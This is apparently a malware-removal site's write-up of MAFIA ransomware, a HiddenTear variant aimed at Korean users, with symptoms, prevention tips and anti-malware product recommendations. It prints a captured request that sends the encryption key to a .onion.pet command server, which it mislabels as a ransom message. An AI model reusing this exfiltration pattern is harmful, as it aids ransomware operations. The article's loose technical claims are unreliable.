MAFIA ransomware – a fraudulent cryptovirus using the AppCheck service to target Korean users

MAFIA virus is a unique variant of the HiddenTear type ransomware which infiltrates the system as the winlogin.exe process. According to research, this type of ransomware is targeted towards Korean users as it uses their language in its ransom notes. Once installed, the sneaky cyber threat stops a service called AppCheck and several databases processes to be able to perform file encryption. Corrupted documents are locked with the help of AES-256 excryption algorithm and then marked by using the .MAFIA file extension. After that, a ransom message called Information.html is displayed. Virus developers are using a Tor proxy for C2 communication.
| Name | MAFIA |
|---|---|
| Type | Ransomware |
| Dangers | Data and money loss |
| Related to | HiddenTear |
| Process | winlogin.exe |
| Service used | AppCheck |
| Extension | .MAFIA file extension |
| Ransom note | Information.html |
| Communication | A Tor proxy for C2 communication is used |
| Target | Korean-speaking people |
| Elimination | Use FortectIntego to get rid of the dangerous cyber threat |
It is known that the criminals hiding behind this virus are displaying such a message to victims' computers:
GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1
Host: wibkilmskir4rlxz.onion.pet
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36
MAFIA ransomware uses a unique encryption algorithm to lock important users' files. This algorithm is called AES-256[1] and is considered one of the most popular file encryption algorithm. As all keys that are generated when using this algorithm are stored on remote servers and kept in reach only for their owners, so the decryption code is impossible to discover or guess. Unfortunately, Mafia ransomware removal does not help you to unlock encrypted data. For that, you should rely on your files' backups or follow our data recovery steps.
As soon as you get infected with this cryptovirus, you spot the following symptoms:
- Files have the .MAFIA extension appended and cannot be opened;
- A ransom note named Information.html shows on the PC screen;
- The hazardous file called winlogin.exe is running in system's background.
Some good news is that this virus uses OpenSSL[2] for files' encryption which slows down the entire process. This means that you can try to interrupt the hazardous activity of the ransomware by turning off your computer or stopping the winlogin.exe process. However, if you do not make this on time, the infection takes over the whole system. If you are in such a state at this time, you need to remove MAFIA ransomware without any hesitation. We recommend using professional anti-malware tools e.g. FortectIntego.
In addition, we want to advise you to keep your data safe from other possible attacks in the future. To prevent data corruption, keep extra copies of your valuable data (documents, business files, reports, photos, videos, art) stored on an external hard drive, cloud, even a CD. In this case, even if you happen to get infected with this malware and find your data encrypted, data copies which are kept on the external devices will remain untouched.

The main method used by ransomware to get into the system is spam
According to malware researchers form Ioys.gr[3], ransomware-type infections are most likely to enter the computer system thru a phishing message. Cybercrooks drop numerous spam emails to victims which include a hazardous attachment or link inserted. However, it is easy to get tricked by such message as it might look like:
- Report;
- Invoice;
- Various statements;
- Software updates;
- etc.
Our advice would be to eliminate all phishing emails you receive if you are not waiting for anything important at the moment. This is a way to prevent a serious ransomware infection.
Another recommendation for you is to install antivirus protection if you do not already have one running on your computer. Although in some cases the ransomware might interrupt the activity of the anti-malware program, it still is a good option for detecting various cyber threats that might enter the system unnoticed.
Use professional tools for the elimination of MAFIA ransomware
You need to remove MAFIA virus from your computer as soon as you detect it to avoid further possible damage. Manual elimination, in this case, is not possible as the cyber threat is too dangerous itself and might hide a lot of hazardous components inside the computer system. For such case, you should lean on anti-malware help. We recommend using programs such as FortectIntego, SpyHunterCombo Cleaner, or MalwarebytesMalwarebytes.
After you perform the MAFIA ransomware removal, make sure you complete one more step. IT experts strongly advise doing some system backups and checking the entire computer in case some virus-related components are still hiding.
Was this guide helpful?
Be the first to comment